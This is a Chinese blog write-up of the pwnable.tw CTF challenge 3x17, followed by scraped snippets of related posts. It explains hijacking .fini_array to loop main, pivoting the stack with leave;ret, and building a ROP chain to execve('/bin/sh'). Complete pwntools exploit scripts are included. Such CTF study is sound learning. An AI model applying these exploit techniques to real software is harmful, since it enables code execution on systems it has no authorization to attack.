3x17

文章主要是参考了https://xuanxuanblingbling.github.io/ctf/pwn/2019/09/06/317/

首先我们检查一下开启的保护



运行一下,先让输入addr后输入data,感觉像是任意地址写,但是没有没有地址泄漏的功能。

放入IDA分析,程序是个静态链接的ELF,因为去除了符号表,所以什么符号都没有,如果用IDA分析还需要先找到main函数。

这里有两种办法:

  1. _start函数中,__libc_start_main(main,argc,argv&env,init,fini,rtld_fini),当调用__libc_start_main时,rdi中的参数即为main函数的地址。

  2. 通过打印的字符串交叉引用找到main函数

这里引用一下大佬的图



我们照着把函数名改过来



首先进入main函数分析一下



main函数开启了Cannary保护,可见工具又是也不一定管用。

main函数中有个变量byte_4B9330,位于bss段,初值为0,运行main函数时会自增1,只有当这个变量为1时才能写。

中间sub__40EE70这个函数很复杂,我们用gdb分析一下,发现它把我们输入的地址的字符串转换成了地址值。也就是strtol()这个函数。strtol函数会将参数nptr字符串根据参数base来转换成长整型数。



这里我们发现0x457就是1111的十六进制,即我们输入的地址就是要写的地址的十进制形式,但是我们目前只有一次机会,仅能写0x18个字节,然而我们不知道栈的地址,也无法覆盖ret的地址,无法劫持RIP。

main函数的启动过程

还记的 __libc_start_main的几个参数里有两个东西么(__libc_csu_init,__libc_csu_fini),这俩是干啥的呢?

.text:0000000000401A5F                 mov     r8, offset__libc_csu_fini
.text:0000000000401A66 mov rcx, __libc_csu_init

csu是啥意思?即 “C start up”

顾名思义,一个是init,开始时函数。一个是fini,结束时的函数。所以可见main函数的地位并没有我们刚接触c语言是那么至高无上,他既不是程序执行时的第一个函数,也不是最后一个函数。

另外在IDA的 segments可以看到如下四个段:



可看到.init和.fini是可执行的段。而.init_array和.fini_array数组,是可读可写的段,里面存着函数的地址。init为__libc_csu_init函数指针,fini为__libc_csu_fini函数指针。

可知:

__libc_csu_init执行.init和.init_array

__libc_csu_fini执行.fini和.fini_array

那启动流程到底是啥样的呢?

  • __libc_csu_init
  • main
  • __libc_csu_fini

更细致的说顺序如下:

  • .init
  • .init_array[0]
  • .init_array[1]
  • .init_array[n]
  • main
  • .fini_array[n]
  • .fini_array[1]
  • .fini_array[0]
  • .fini

首先分析一下__libc_csu_fini这个函数

__libc_csu_fini (void)
{
#ifndef LIBC_NONSHARED
size_t i = __fini_array_end - __fini_array_start;
while (i-- > 0)
(*__fini_array_start [i]) (); # ifndef NO_INITFINI
_fini ();
# endif
#endif
}

如下图,我们知道了size_t i = __fini_array_end - __fini_array_start; 其中i是为2,也就是说fini_array数组中有2个值。

覆写.fini_array

main -> __libc_csu_fini  -> .fini_array[1] ->.fini_array[0]

如果我们把fini_array[1]覆盖成任意代码的地址,不就是成功劫持RIP了么!那么好,劫持到哪?如果有后门函数就好了!查一下没有。

我们只能先将其覆盖成下图这样,然后自己构造ROP



这可以样就可以一直循环调用main函数啦!但好像看起来还是无法写多次啊,因为byte_4B9330这个全局变量一直在自增啊,永远比1大呀。观察一下这个变量:

(unsigned __int8)++byte_4B9330

这是8bit的整型,从byte_4B9330这个变量名也能看出来(byte),范围是0-255,所以当我们按照如上的方法改写.fini_array段,这个变量会疯狂加一,自增一会就溢出了,然后又会回到1,然后就会停到read系统调用等待写入,就又可以写了。

from pwn import *
context(arch="amd64",os='linux',log_level='debug')
p = process("./3x17") fini_array = 0x4B40F0
main_addr = 0x401B6D
libc_csu_fini = 0x402960 def write(addr,data):
p.sendafter('addr:',str(addr))
p.sendafter('data:',data) write(fini_array,p64(libc_csu_fini)+p64(main_addr))
p.interactive()

可以看到跟我们想的一样

栈迁移

我们从:一次 任意地址 写 0x18 个字节

变成了:多次 任意地址 写 0x18 个字节

并且在这个过程中我们已经控制了RIP,但是没有直接的代码或者函数可以用,所以要不是就是自己写shellcode蹦过去,要不就是ROP。但是程序中没有可写可执行的代码段,我也不知道栈的位置,虽然我能任意地址写,但我也就没有办法布置栈的内容,也就没有办法实现ROP。但是,我们是控制了RIP的,我们可以把栈迁移到我们知道的地方,只要再此之前布置好那个位置,然后只要程序返回,我们就可以成功的ROP啦!

回到__libc_csu_fini函数,也就是题目中的sub_402960函数

可见在这个函数中rbp之前的值暂时被放到栈里了,然后将rbp赋值为0x4b40f0也就是fini_array,然后就去调用了fini_array的函数,fini_array的值我们是可以控制的,这样我们可以劫持RIP到任何地方。



leave指令就相当于:

mov rsp,rbp
pop rbp

我们可以利用leave函数实现栈迁移,前提是我们可以控制rbp的值,而上面说了rbp赋值为0x4b40f0,我们就可以利用这一点。为了不破环程序循环,我们可以将ROP写到0x4b40f0+0x8*2 也就是0x4b4100的地方。

fini_array[0]执行leave_ret后我们会ret [0x4b40f8]也就是去执行fini_array[1]而我们的ROP在0x4b4010处,所以我们可以覆盖ret,nop等都可以,使程序去执行0x4b4010处的指令

mov rsp,rbp    ;rsp=rbp=0x4B40F0
pop rbp ;rsp=0x4B40F8 rbp=?
ret ;rip=[0x4b40f8] ,rsp=0x4b4100

测试一下

#coding:utf-8
from pwn import *
context(arch="amd64",os='linux',log_level='debug')
p = process('./3x17') pop_rax_ret = 0x41e4af fini_array = 0x4B40F0
main_addr = 0x401B6D
libc_csu_fini = 0x402960
leave_ret = 0x401C4B esp = 0x4B4100
ret = 0x401016 def write(addr,data):
p.sendafter('addr:',str(addr))
p.sendafter('data:',data) #使程序循环跑起来 fini_array[0] fini_array[1]
write(fini_array,p64(libc_csu_fini)+p64(main_addr))
#ROP
write(esp,p64(pop_rax_ret)) gdb.attach(p,"b *0x401C4B")
#结束程序循环,进入ROP
write(fini_array,p64(leave_ret)+p64(ret)) p.interactive()

我们补上ROP再来细细分析。

执行write(fini_array,p64(leave_ret)+p64(ret))之前,也就是还未退出main函数,我们已经成功将fini_array[0]修改成了leave_ret,将fini_array[1]修改成了ret。为了直观我们在来看看这个图。





此时我们main函数退出后,应该回去执行fini_array[0],也就是去执行leave_ret。



我们将RIP劫持到fini_array[0]的leave_ret后



之后就会去ret到我们的ROP了。

解题脚本

#coding:utf-8
from pwn import *
context(arch="amd64",os='linux',log_level='debug')
p = process('./3x17') syscall_ret = 0x471db5
pop_rax_ret = 0x41e4af
pop_rdx_ret = 0x446e35
pop_rsi_ret = 0x406c30
pop_rdi_ret = 0x401696 bin_sh_addr = 0x4B9500 fini_array = 0x4B40F0
main_addr = 0x401B6D
libc_csu_fini = 0x402960
leave_ret = 0x401C4B esp = 0x4B4100
ret = 0x401016 def write(addr,data):
p.sendafter('addr:',str(addr))
p.sendafter('data:',data) #使程序循环跑起来 fini_array[0] fini_array[1]
write(fini_array,p64(libc_csu_fini)+p64(main_addr))
#在一个可读可写的地方写入/bin/sh
write(bin_sh_addr,"/bin/sh\x00") #syscall('/bin/sh\x00',0,0)
write(esp,p64(pop_rax_ret))
write(esp+8,p64(0x3b))
write(esp+16,p64(pop_rdi_ret))
write(esp+24,p64(bin_sh_addr))
write(esp+32,p64(pop_rsi_ret))
write(esp+40,p64(0))
write(esp+48,p64(pop_rdx_ret))
write(esp+56,p64(0))
write(esp+64,p64(syscall_ret))
#gdb.attach(p,"b *0x401C4B")
#结束程序循环,进入ROP
write(fini_array,p64(leave_ret)+p64(ret)) p.interactive()

pwnable.tw 3x17的更多相关文章

  1. pwnable.tw applestore

    存储结构 0x804B070链表头 struct _mycart_binlist { int *name; //ebp-0x20 int price; //ebp-0x1c struct _mycar ...

  2. pwnable.tw silver_bullet

    产生漏洞的原因 int __cdecl power_up(char *dest) { char s; // [esp+0h] [ebp-34h] size_t new_len; // [esp+30h ...

  3. pwnable.tw hacknote

    产生漏洞的原因是free后chunk未置零 unsigned int sub_80487D4() { int index; // [esp+4h] [ebp-14h] char buf; // [es ...

  4. pwnable.tw dubblesort

    (留坑,远程没打成功) int __cdecl main(int argc, const char **argv, const char **envp) { int t_num_count; // e ...

  5. pwnable.tw calc

    题目代码量比较大(对于菜鸡我来说orz),找了很久才发现一个能利用的漏洞 运行之发现是一个计算器的程序,简单测试下发现当输入的操作数超过10位时会有一个整型溢出 这里调试了一下发现是printf(&q ...

  6. pwnable.tw start&orw

    emm,之前一直想做tw的pwnable苦于没有小飞机(,今天做了一下发现都是比较硬核的pwn题目,对于我这种刚入门?的菜鸡来说可能难度刚好(orz 1.start 比较简单的一个栈溢出,给出一个li ...

  7. 【pwnable.tw】 starbound

    此题的代码量很大,看了一整天的逻辑代码,没发现什么问题... 整个函数的逻辑主要是红框中两个指针的循环赋值和调用,其中第一个指针是主功能函数,第二个数组是子功能函数. 函数的漏洞主要在main函数中, ...

  8. Pwnable.tw start

    Let's start the CTF:和stdin输入的字符串在同一个栈上,再准确点说是他们在栈上同一个地址上,gdb调试看得更清楚: 调试了就很容易看出来在堆栈上是同一块地址.发生栈溢出是因为:r ...

  9. pwnable.tw orw

    orw 首先,检查一下程序的保护机制 开启了canary保护,还是个32位的程序,应该是个简单的题

随机推荐

  1. OAuth2理解

    OAuth2: 1.他是针对特定问题的一种解决方案 OAuth2主要可以解决两个问题: (1)开放系统间的授权问题 例如:当你想要一个打印机器去打印自己百度网盘中的照片时,该机器并没有访问自己百度网盘 ...

  2. 关于电脑硬盘的二三事(SATA接口)

    @ 目录 前言 接口分类 SATA3接口 机械硬盘 机械硬盘的特点和主要参数 西部数据机械盘分类 绿·蓝·黑盘 红盘 紫盘 金盘 希捷机械盘分类 酷狼 酷鱼 酷鹰 银河 SATA3接口的固态硬盘 固态 ...

  3. 基于docker搭建DNSmasq

    一.概述 DNSmasq是一个小巧且方便地用于配置DNS和DHCP的工具,适用于小型网络,它提供了DNS功能和可选择的DHCP功能.它服务那些只在本地适用的域名,这些域名是不会在全球的DNS服务器中出 ...

  4. Java RPC 框架 Solon 1.3.9 发布,更便利的支持

    Solon 是一个微型的Java RPC开发框架.项目从2018年启动以来,参考过大量前人作品:历时两年,4000多次的commit:内核保持0.1m的身材,超高的跑分,良好的使用体验.支持:RPC. ...

  5. 剑指 Offer 43. 1~n 整数中 1 出现的次数 + 数位模拟 + 思维

    剑指 Offer 43. 1-n 整数中 1 出现的次数 Offer_43 题目描述 题解分析 java代码 package com.walegarrett.offer; /** * @Author ...

  6. CCF(元素选择器:50分):字符串+模拟

    元素选择器 201809-3 这里我只考虑了没有后代选择器的情况 #include<iostream> #include<cstdio> #include<cstring ...

  7. Redis单机数据库的实现原理

    本文主要介绍Redis的数据库结构,Redis两种持久化的原理:RDB持久化.AOF持久化,以及Redis事件分类及执行原理.最后,分别介绍了单机班Redid客户端和Redis服务器的使用和实现原理. ...

  8. celery 与 flask 实现异步任务调度

    Flask 定了2中上下文,来实现机遇线程\协程的,wsgi服务的请求(request.session)和存储(g,current_app )过程,通过栈来完成不同线程和协程的上下文切换,在与cele ...

  9. (数据科学学习手札112)Python+Dash快速web应用开发——表单控件篇(上)

    本文示例代码已上传至我的Github仓库https://github.com/CNFeffery/DataScienceStudyNotes 1 简介 这是我的系列教程Python+Dash快速web ...

  10. 解析Wide Residual Networks

    Wide Residual Networks (WRNs)是2016年被提出的基于扩展通道数学习机制的卷积神经网络.对深度卷积神经网络有了解的应该知道随着网络越深性能越好,但是训练深度卷积神经网络存在 ...